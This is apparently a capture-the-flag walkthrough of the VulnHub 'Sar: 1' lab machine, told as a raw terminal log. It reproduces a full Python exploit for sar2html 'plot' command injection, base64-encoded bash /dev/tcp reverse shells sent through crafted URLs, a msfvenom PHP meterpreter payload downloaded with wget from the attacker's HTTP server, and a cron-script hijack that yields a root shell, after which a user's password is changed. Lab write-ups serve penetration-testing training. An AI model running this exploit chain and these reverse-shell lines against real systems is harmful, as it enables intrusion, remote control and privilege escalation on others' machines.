SAR: 1
 
About Release
Back to the Top
- Name: Sar: 1
- Date release: 15 Feb 2020
- Author: Love
- Series: Sar
Download
Back to the Top
Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network. If you understand the risks, please download!
- sar.zip (Size: 2.7 GB)
- Download: https://drive.google.com/open?id=1AFAmM21AwiAEiVFUA0cSr_GeAYaxd3lQ
- Download (Mirror): https://download.vulnhub.com/sar/sar.zip
Description
Back to the Top
Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing.
File Information
Back to the Top
- Filename: sar.zip
- File size: 2.7 GB
- MD5: B872E6DE73622EA39C762D6C3E298E73
- SHA1: 6BEE6AB15F9DE0099DB82D815F5D1D2099054B3A
Virtual Machine
Back to the Top
- Format: Virtual Machine (Virtualbox - OVA)
- Operating System: Linux
Networking
Back to the Top
- DHCP service: Enabled
- IP address: Automatically assign
Screenshots
Back to the Top


1.find hosts
┌──(kwkl㉿kwkl)-[~]
└─$ sudo netdiscover -i eth2
┌──(kwkl㉿kwkl)-[~]
└─$ nmap -v -sn 172.16.70.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-08 11:39 HKT
Initiating Ping Scan at 11:39
Scanning 256 hosts [2 ports/host]
Completed Ping Scan at 11:39, 2.40s elapsed (256 total hosts)
Initiating Parallel DNS resolution of 4 hosts. at 11:39
Completed Parallel DNS resolution of 4 hosts. at 11:39, 6.51s elapsed
Nmap scan report for 172.16.70.0 [host down]
Nmap scan report for 172.16.70.1 (172.16.70.1)
Host is up (0.0048s latency).
Nmap scan report for 172.16.70.2 (172.16.70.2)
Host is up (0.0040s latency).
Nmap scan report for 172.16.70.3 [host down]
Nmap scan report for 172.16.70.4 [host down]
Nmap scan report for 172.16.70.5 [host down]
Nmap scan report for 172.16.70.6 [host down]
Nmap scan report for 172.16.70.7 [host down]
Nmap scan report for 172.16.70.8 [host down]
Nmap scan report for 172.16.70.9 [host down]
Nmap scan report for 172.16.70.10 [host down]
Nmap scan report for 172.16.70.11 [host down]
Nmap scan report for 172.16.70.12 [host down]
Nmap scan report for 172.16.70.13 [host down]
Nmap scan report for 172.16.70.14 [host down]
Nmap scan report for 172.16.70.15 [host down]
Nmap scan report for 172.16.70.16 [host down]
Nmap scan report for 172.16.70.17 [host down]
Nmap scan report for 172.16.70.18 [host down]
Nmap scan report for 172.16.70.19 [host down]
Nmap scan report for 172.16.70.20 [host down]
Nmap scan report for 172.16.70.21 [host down]
Nmap scan report for 172.16.70.22 [host down]
Nmap scan report for 172.16.70.23 [host down]
Nmap scan report for 172.16.70.24 [host down]
Nmap scan report for 172.16.70.25 [host down]
Nmap scan report for 172.16.70.26 [host down]
Nmap scan report for 172.16.70.27 [host down]
Nmap scan report for 172.16.70.28 [host down]
Nmap scan report for 172.16.70.29 [host down]
Nmap scan report for 172.16.70.30 [host down]
Nmap scan report for 172.16.70.31 [host down]
Nmap scan report for 172.16.70.32 [host down]
Nmap scan report for 172.16.70.33 [host down]
Nmap scan report for 172.16.70.34 [host down]
Nmap scan report for 172.16.70.35 [host down]
Nmap scan report for 172.16.70.36 [host down]
Nmap scan report for 172.16.70.37 [host down]
Nmap scan report for 172.16.70.38 [host down]
Nmap scan report for 172.16.70.39 [host down]
Nmap scan report for 172.16.70.40 [host down]
Nmap scan report for 172.16.70.41 [host down]
Nmap scan report for 172.16.70.42 [host down]
Nmap scan report for 172.16.70.43 [host down]
Nmap scan report for 172.16.70.44 [host down]
Nmap scan report for 172.16.70.45 [host down]
Nmap scan report for 172.16.70.46 [host down]
Nmap scan report for 172.16.70.47 [host down]
Nmap scan report for 172.16.70.48 [host down]
Nmap scan report for 172.16.70.49 [host down]
Nmap scan report for 172.16.70.50 [host down]
Nmap scan report for 172.16.70.51 [host down]
Nmap scan report for 172.16.70.52 [host down]
Nmap scan report for 172.16.70.53 [host down]
Nmap scan report for 172.16.70.54 [host down]
Nmap scan report for 172.16.70.55 [host down]
Nmap scan report for 172.16.70.56 [host down]
Nmap scan report for 172.16.70.57 [host down]
Nmap scan report for 172.16.70.58 [host down]
Nmap scan report for 172.16.70.59 [host down]
Nmap scan report for 172.16.70.60 [host down]
Nmap scan report for 172.16.70.61 [host down]
Nmap scan report for 172.16.70.62 [host down]
Nmap scan report for 172.16.70.63 [host down]
Nmap scan report for 172.16.70.64 [host down]
Nmap scan report for 172.16.70.65 [host down]
Nmap scan report for 172.16.70.66 [host down]
Nmap scan report for 172.16.70.67 [host down]
Nmap scan report for 172.16.70.68 [host down]
Nmap scan report for 172.16.70.69 [host down]
Nmap scan report for 172.16.70.70 [host down]
Nmap scan report for 172.16.70.71 [host down]
Nmap scan report for 172.16.70.72 [host down]
Nmap scan report for 172.16.70.73 [host down]
Nmap scan report for 172.16.70.74 [host down]
Nmap scan report for 172.16.70.75 [host down]
Nmap scan report for 172.16.70.76 [host down]
Nmap scan report for 172.16.70.77 [host down]
Nmap scan report for 172.16.70.78 [host down]
Nmap scan report for 172.16.70.79 [host down]
Nmap scan report for 172.16.70.80 [host down]
Nmap scan report for 172.16.70.81 [host down]
Nmap scan report for 172.16.70.82 [host down]
Nmap scan report for 172.16.70.83 [host down]
Nmap scan report for 172.16.70.84 [host down]
Nmap scan report for 172.16.70.85 [host down]
Nmap scan report for 172.16.70.86 [host down]
Nmap scan report for 172.16.70.87 [host down]
Nmap scan report for 172.16.70.88 [host down]
Nmap scan report for 172.16.70.89 [host down]
Nmap scan report for 172.16.70.90 [host down]
Nmap scan report for 172.16.70.91 [host down]
Nmap scan report for 172.16.70.92 [host down]
Nmap scan report for 172.16.70.93 [host down]
Nmap scan report for 172.16.70.94 [host down]
Nmap scan report for 172.16.70.95 [host down]
Nmap scan report for 172.16.70.96 [host down]
Nmap scan report for 172.16.70.97 [host down]
Nmap scan report for 172.16.70.98 [host down]
Nmap scan report for 172.16.70.99 [host down]
Nmap scan report for 172.16.70.100 [host down]
Nmap scan report for 172.16.70.101 [host down]
Nmap scan report for 172.16.70.102 [host down]
Nmap scan report for 172.16.70.103 [host down]
Nmap scan report for 172.16.70.104 [host down]
Nmap scan report for 172.16.70.105 [host down]
Nmap scan report for 172.16.70.106 [host down]
Nmap scan report for 172.16.70.107 [host down]
Nmap scan report for 172.16.70.108 [host down]
Nmap scan report for 172.16.70.109 [host down]
Nmap scan report for 172.16.70.110 [host down]
Nmap scan report for 172.16.70.111 [host down]
Nmap scan report for 172.16.70.112 [host down]
Nmap scan report for 172.16.70.113 [host down]
Nmap scan report for 172.16.70.114 [host down]
Nmap scan report for 172.16.70.115 [host down]
Nmap scan report for 172.16.70.116 [host down]
Nmap scan report for 172.16.70.117 [host down]
Nmap scan report for 172.16.70.118 [host down]
Nmap scan report for 172.16.70.119 [host down]
Nmap scan report for 172.16.70.120 [host down]
Nmap scan report for 172.16.70.121 [host down]
Nmap scan report for 172.16.70.122 [host down]
Nmap scan report for 172.16.70.123 [host down]
Nmap scan report for 172.16.70.124 [host down]
Nmap scan report for 172.16.70.125 [host down]
Nmap scan report for 172.16.70.126 [host down]
Nmap scan report for 172.16.70.127 [host down]
Nmap scan report for 172.16.70.128 [host down]
Nmap scan report for 172.16.70.129 [host down]
Nmap scan report for 172.16.70.130 [host down]
Nmap scan report for 172.16.70.131 [host down]
Nmap scan report for 172.16.70.132 (172.16.70.132)
Host is up (0.00027s latency).
Nmap scan report for 172.16.70.133 [host down]
Nmap scan report for 172.16.70.134 [host down]
Nmap scan report for 172.16.70.135 [host down]
Nmap scan report for 172.16.70.136 [host down]
Nmap scan report for 172.16.70.137 [host down]
Nmap scan report for 172.16.70.138 [host down]
Nmap scan report for 172.16.70.139 [host down]
Nmap scan report for 172.16.70.140 [host down]
Nmap scan report for 172.16.70.141 [host down]
Nmap scan report for 172.16.70.142 [host down]
Nmap scan report for 172.16.70.143 [host down]
Nmap scan report for 172.16.70.144 [host down]
Nmap scan report for 172.16.70.145 [host down]
Nmap scan report for 172.16.70.146 [host down]
Nmap scan report for 172.16.70.147 (172.16.70.147)
Host is up (0.0012s latency).
Nmap scan report for 172.16.70.148 [host down]
Nmap scan report for 172.16.70.149 [host down]
Nmap scan report for 172.16.70.150 [host down]
Nmap scan report for 172.16.70.151 [host down]
Nmap scan report for 172.16.70.152 [host down]
Nmap scan report for 172.16.70.153 [host down]
Nmap scan report for 172.16.70.154 [host down]
Nmap scan report for 172.16.70.155 [host down]
Nmap scan report for 172.16.70.156 [host down]
Nmap scan report for 172.16.70.157 [host down]
Nmap scan report for 172.16.70.158 [host down]
Nmap scan report for 172.16.70.159 [host down]
Nmap scan report for 172.16.70.160 [host down]
Nmap scan report for 172.16.70.161 [host down]
Nmap scan report for 172.16.70.162 [host down]
Nmap scan report for 172.16.70.163 [host down]
Nmap scan report for 172.16.70.164 [host down]
Nmap scan report for 172.16.70.165 [host down]
Nmap scan report for 172.16.70.166 [host down]
Nmap scan report for 172.16.70.167 [host down]
Nmap scan report for 172.16.70.168 [host down]
Nmap scan report for 172.16.70.169 [host down]
Nmap scan report for 172.16.70.170 [host down]
Nmap scan report for 172.16.70.171 [host down]
Nmap scan report for 172.16.70.172 [host down]
Nmap scan report for 172.16.70.173 [host down]
Nmap scan report for 172.16.70.174 [host down]
Nmap scan report for 172.16.70.175 [host down]
Nmap scan report for 172.16.70.176 [host down]
Nmap scan report for 172.16.70.177 [host down]
Nmap scan report for 172.16.70.178 [host down]
Nmap scan report for 172.16.70.179 [host down]
Nmap scan report for 172.16.70.180 [host down]
Nmap scan report for 172.16.70.181 [host down]
Nmap scan report for 172.16.70.182 [host down]
Nmap scan report for 172.16.70.183 [host down]
Nmap scan report for 172.16.70.184 [host down]
Nmap scan report for 172.16.70.185 [host down]
Nmap scan report for 172.16.70.186 [host down]
Nmap scan report for 172.16.70.187 [host down]
Nmap scan report for 172.16.70.188 [host down]
Nmap scan report for 172.16.70.189 [host down]
Nmap scan report for 172.16.70.190 [host down]
Nmap scan report for 172.16.70.191 [host down]
Nmap scan report for 172.16.70.192 [host down]
Nmap scan report for 172.16.70.193 [host down]
Nmap scan report for 172.16.70.194 [host down]
Nmap scan report for 172.16.70.195 [host down]
Nmap scan report for 172.16.70.196 [host down]
Nmap scan report for 172.16.70.197 [host down]
Nmap scan report for 172.16.70.198 [host down]
Nmap scan report for 172.16.70.199 [host down]
Nmap scan report for 172.16.70.200 [host down]
Nmap scan report for 172.16.70.201 [host down]
Nmap scan report for 172.16.70.202 [host down]
Nmap scan report for 172.16.70.203 [host down]
Nmap scan report for 172.16.70.204 [host down]
Nmap scan report for 172.16.70.205 [host down]
Nmap scan report for 172.16.70.206 [host down]
Nmap scan report for 172.16.70.207 [host down]
Nmap scan report for 172.16.70.208 [host down]
Nmap scan report for 172.16.70.209 [host down]
Nmap scan report for 172.16.70.210 [host down]
Nmap scan report for 172.16.70.211 [host down]
Nmap scan report for 172.16.70.212 [host down]
Nmap scan report for 172.16.70.213 [host down]
Nmap scan report for 172.16.70.214 [host down]
Nmap scan report for 172.16.70.215 [host down]
Nmap scan report for 172.16.70.216 [host down]
Nmap scan report for 172.16.70.217 [host down]
Nmap scan report for 172.16.70.218 [host down]
Nmap scan report for 172.16.70.219 [host down]
Nmap scan report for 172.16.70.220 [host down]
Nmap scan report for 172.16.70.221 [host down]
Nmap scan report for 172.16.70.222 [host down]
Nmap scan report for 172.16.70.223 [host down]
Nmap scan report for 172.16.70.224 [host down]
Nmap scan report for 172.16.70.225 [host down]
Nmap scan report for 172.16.70.226 [host down]
Nmap scan report for 172.16.70.227 [host down]
Nmap scan report for 172.16.70.228 [host down]
Nmap scan report for 172.16.70.229 [host down]
Nmap scan report for 172.16.70.230 [host down]
Nmap scan report for 172.16.70.231 [host down]
Nmap scan report for 172.16.70.232 [host down]
Nmap scan report for 172.16.70.233 [host down]
Nmap scan report for 172.16.70.234 [host down]
Nmap scan report for 172.16.70.235 [host down]
Nmap scan report for 172.16.70.236 [host down]
Nmap scan report for 172.16.70.237 [host down]
Nmap scan report for 172.16.70.238 [host down]
Nmap scan report for 172.16.70.239 [host down]
Nmap scan report for 172.16.70.240 [host down]
Nmap scan report for 172.16.70.241 [host down]
Nmap scan report for 172.16.70.242 [host down]
Nmap scan report for 172.16.70.243 [host down]
Nmap scan report for 172.16.70.244 [host down]
Nmap scan report for 172.16.70.245 [host down]
Nmap scan report for 172.16.70.246 [host down]
Nmap scan report for 172.16.70.247 [host down]
Nmap scan report for 172.16.70.248 [host down]
Nmap scan report for 172.16.70.249 [host down]
Nmap scan report for 172.16.70.250 [host down]
Nmap scan report for 172.16.70.251 [host down]
Nmap scan report for 172.16.70.252 [host down]
Nmap scan report for 172.16.70.253 [host down]
Nmap scan report for 172.16.70.254 [host down]
Nmap scan report for 172.16.70.255 [host down]
Nmap done: 256 IP addresses (4 hosts up) scanned in 8.92 seconds2.find some info
┌──(kwkl㉿kwkl)-[~]
└─$ nmap -Pn -T4 -p- -A 172.16.70.147
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-08 14:41 HKT
Nmap scan report for 172.16.70.147 (172.16.70.147)
Host is up (0.00073s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.20 seconds┌──(kwkl㉿kwkl)-[~]
└─$ dirb  http://172.16.70.147                                                                                                                                             255 ⨯
-----------------
DIRB v2.22    
By The Dark Raver
-----------------
START_TIME: Sat Jul  8 12:41:03 2023
URL_BASE: http://172.16.70.147/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612                                                          
---- Scanning URL: http://172.16.70.147/ ----
+ http://172.16.70.147/index.html (CODE:200|SIZE:10918)                                                                                                                         
+ http://172.16.70.147/phpinfo.php (CODE:200|SIZE:95497)                                                                                                                        
+ http://172.16.70.147/robots.txt (CODE:200|SIZE:9)                                                                                                                             
+ http://172.16.70.147/server-status (CODE:403|SIZE:278)                                                                                                                        
                                                                                                                                                                                
-----------------
END_TIME: Sat Jul  8 12:41:07 2023
DOWNLOADED: 4612 - FOUND: 4some documents can be accessed!

http://172.16.70.147/

http://172.16.70.147/robots.txt

http://172.16.70.147/phpinfo.php

http://172.16.70.147/sar2HTML/index.php
useful info -》 sar2HTML
3.find exp
https://www.exploit-db.com

two infos is useful
1.
# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage:https://github.com/cemtan/sar2html 
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1
#!/usr/bin/env python3
import requests
import re
from cmd import Cmd
url = input("Enter The url => ")
class Terminal(Cmd):
    prompt = "Command => "
    def default(self, args):
        exploiter(args)
def exploiter(cmd):
    global url
    sess = requests.session()
    output = sess.get(f"{url}/index.php?plot=;{cmd}")
    try:
        out = re.findall("<option value=(.*?)>", output.text)
    except:
        print ("Error!!")
    for ouut in out:
        if "There is no defined host..." not in ouut:
            if "null selected" not in ouut:
                if "selected" not in ouut:
                    print (ouut)
    print ()
if __name__ == ("__main__"):
    terminal = Terminal()
    terminal.cmdloop()2.
# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html 
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7
In web application you will see index.php?plot url extension.
http://<ipaddr>/index.php?plot=;<command-here> will execute 
the command you entered. After command injection press "select # host" then your command's 
output will appear bottom side of the scroll screen.
it can be useful!
let’s use it!
 
┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvnp 4444                                                                                                                                                            1 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444 
┌──(kwkl㉿kwkl)-[~]
└─$ echo "bash -i &>/dev/tcp/172.16.70.132/4444 <&1" | base64
YmFzaCAtaSAmPi9kZXYvdGNwLzE3Mi4xNi43MC4xMzIvNDQ0NCA8JjEK3.constructe the url!
http://172.16.70.147/sar2HTML/index.php?plot=;echo%20YmFzaCAtaSAmPi9kZXYvdGNwLzE3Mi4xNi43MC4xMzIvNDQ0NCA8JjEK%20|%20base64%20-d%20|%20bash
echo YmFzaCAtaSAmPi9kZXYvdGNwLzE3Mi4xNi43MC4xMzIvNDQ0NCA8JjEK | base64 -d | bash
it is
http://172.16.70.147/sar2HTML/index.php?plot=;echo YmFzaCAtaSAmPi9kZXYvdGNwLzE3Mi4xNi43MC4xMzIvNDQ0NCA8JjEK | base64 -d | bash
Success!
┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvnp 4444                                                                                                                                                            1 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.16.70.147.
Ncat: Connection from 172.16.70.147:33224.
bash: cannot set terminal process group (811): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sar:/var/www/html/sar2HTML$ lsthen
www-data@sar:/var/www/html$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh
www-data@sar:/var/www/html$ cat .finally.sh
cat .finally.sh
cat: .finally.sh: No such file or directory
www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh
#!/bin/sh
./write.sh
www-data@sar:/var/www/html$ cat ./writes.sh
cat ./writes.sh
cat: ./writes.sh: No such file or directory
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/sh
touch /tmp/gateway
bash -c 'exec bash -i &>/dev/tcp/192.168.101.34/7777 <&1'
bash -c 'exec bash -i &>/dev/tcp/172.16.70.132/7777 <&1'
www-data@sar:/var/www/html$waite 5 minutes!
┌──(kwkl㉿kwkl)-[~/HODL/htb]
└─$ nc -lvvp 7777                                                                                                                                                            1 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
id
id
id
Ncat: Connection from 172.16.70.147.
Ncat: Connection from 172.16.70.147:36386.
bash: cannot set terminal process group (1600): Inappropriate ioctl for device
bash: no job control in this shell
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# ls
ls
finally.sh
index.html
linpeas.sh
phpinfo.php
robots.txt
sar2HTML
write.sh
root@sar:/var/www/html# cd /root 
cd /root
root@sar:~# ls
ls
root.txt
snap
root@sar:~# cat root.txt
cat root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99
root@sar:~# 
root@sar:~# 
root@sar:~# passwd love 123456
passwd love 123456
Usage: passwd [options] [LOGIN]
Options:
  -a, --all                     report password status on all accounts
  -d, --delete                  delete the password for the named account
  -e, --expire                  force expire the password for the named account
  -h, --help                    display this help message and exit
  -k, --keep-tokens             change password only if expired
  -i, --inactive INACTIVE       set password inactive after expiration
                                to INACTIVE
  -l, --lock                    lock the password of the named account
  -n, --mindays MIN_DAYS        set minimum number of days before password
                                change to MIN_DAYS
  -q, --quiet                   quiet mode
  -r, --repository REPOSITORY   change password in REPOSITORY repository
  -R, --root CHROOT_DIR         directory to chroot into
  -S, --status                  report password status on the named account
  -u, --unlock                  unlock the password of the named account
  -w, --warndays WARN_DAYS      set expiration warning days to WARN_DAYS
  -x, --maxdays MAX_DAYS        set maximum number of days before password
                                change to MAX_DAYS
root@sar:~# passwd love
passwd love
Enter new UNIX password: 123456
Retype new UNIX password: 123456
passwd: password updated successfully
root@sar:~# 
root@sar:~# 
root@sar:~# passwd rootOR we can use python scripts~
1.                                                                                                                                                                        
┌──(kwkl㉿kwkl)-[~/HODL/vulnhub]
└─$ cat sar.py 
# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage:https://github.com/cemtan/sar2html 
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1
#!/usr/bin/env python3
import requests
import re
from cmd import Cmd
url = input("Enter The url => ")
class Terminal(Cmd):
    prompt = "Command => "
    def default(self, args):
        exploiter(args)
def exploiter(cmd):
    global url
    sess = requests.session()
    output = sess.get(f"{url}/index.php?plot=;{cmd}")
    try:
        out = re.findall("<option value=(.*?)>", output.text)
    except:
        print ("Error!!")
    for ouut in out:
        if "There is no defined host..." not in ouut:
            if "null selected" not in ouut:
                if "selected" not in ouut:
                    print (ouut)
    print ()
if __name__ == ("__main__"):
    terminal = Terminal()
    terminal.cmdloop()
    
2.
┌──(kwkl㉿kwkl)-[~/HODL/vulnhub]
└─$ python3 sar.py                                                               
Enter The url => http://172.16.70.147/sar2HTML                    
Command => ls
LICENSE
index.php
linpeas.sh
sar2html
sarDATA
sarFILE
3.
┌──(kwkl㉿kwkl)-[~/HODL/vulnhub]
└─$ msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.70.132 LPORT=4444 -o shell2.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1114 bytes
Saved as: shell2.php
                                                                                                                                                                                 
┌──(kwkl㉿kwkl)-[~/HODL/vulnhub]
└─$ ls
keyring  sar.py  sar.sh  shell2.php
                                                                                                                                                                                 
┌──(kwkl㉿kwkl)-[~/HODL/vulnhub]
└─$ ls                         
keyring  sar.py  sar.sh  shell2.php
                                                                                                                                                                                 
┌──(kwkl㉿kwkl)-[~/HODL/vulnhub]
└─$ python3 -m http.server 5555                                                         
Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...
172.16.70.147 - - [08/Jul/2023 22:59:52] "GET /shell2.php HTTP/1.1" 200 -
172.16.70.147 - - [08/Jul/2023 23:04:15] "GET /shell2.php HTTP/1.1" 200 -
172.16.70.147 - - [08/Jul/2023 23:04:33] "GET /shell2.php HTTP/1.1" 200 -
4.
msf6 payload(php/meterpreter/reverse_tcp) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
Payload options (php/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.70.132    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target
   View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 172.16.70.132:4444 
 
5.
   
 Command => wget http://172.16.70.132:5555/shell2.php ../shell2.php
Command => ls ../
finally.sh
index.html
linpeas.sh
phpinfo.php
robots.txt
sar2HTML
write.sh
Command => wget http://172.16.70.132:5555/shell2.php -O ../shell2.php
Command => ls ../
finally.sh
index.html
linpeas.sh
phpinfo.php
robots.txt
sar2HTML
shell2.php
write.sh
Command => chmod +x ../shell2.php
Command => 
6. browser the url
http://172.16.70.147/shell2.php
  
  7.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 172.16.70.132:4444 
[*] Sending stage (39927 bytes) to 172.16.70.147
[*] Meterpreter session 8 opened (172.16.70.132:4444 -> 172.16.70.147:45154) at 2023-07-08 23:06:25 +0800
meterpreter > shell
Process 1601 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh
cat /var/www/html/finally.sh
#!/bin/sh
./write.sh
8.
┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvvp 7777      
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
9.
echo "bash -c 'exec bash -i &>/dev/tcp/172.16.70.132/7777 <&1'" >> write.sh
cat write.sh
#!/bin/sh
touch /tmp/gateway
bash -c 'exec bash -i &>/dev/tcp/192.168.101.34/7777 <&1'
bash -c 'exec bash -i &>/dev/tcp/172.16.70.132/7777 <&1'
bash -c 'exec bash -i &>/dev/tcp/172.16.70.132/7777 <&1'
10.
Ncat: Connection from 172.16.70.147.
Ncat: Connection from 172.16.70.147:42102.
bash: cannot set terminal process group (1667): Inappropriate ioctl for device
bash: no job control in this shell
root@sar:/var/www/html# 
root@sar:/var/www/html# 
root@sar:/var/www/html# 
root@sar:/var/www/html# cat /root/root.xt
cat /root/root.xt
cat: /root/root.xt: No such file or directory
root@sar:/var/www/html# cat /root/root.txt
cat /root/root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99
root@sar:/var/www/html#or
Command => pwd
/var/www/html/sar2HTML
Command => echo "bash -c 'exec bash -i &>/dev/tcp/172.16.70.132/7777 <&1'" >> ../write.sh
Command => cat ../write.sh
#!/bin/sh
touch /tmp/gateway
bash -c 'exec bash -i &
bash -c 'exec bash -i &
bash -c 'exec bash -i &
Command => cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh
Command => 
┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvvp 7777                                                                                                                                                          130 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
id
id
id
id
id
id
Ncat: Connection from 172.16.70.147.
Ncat: Connection from 172.16.70.147:42118.
bash: cannot set terminal process group (1835): Inappropriate ioctl for device
bash: no job control in this shell
root@sar:/var/www/html# 
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# 
  
######if we use this solution ,look simply ,but it can run too!other:upload linpeas.sh can get many infos

Change the user love’s password so we can login for fun!

                










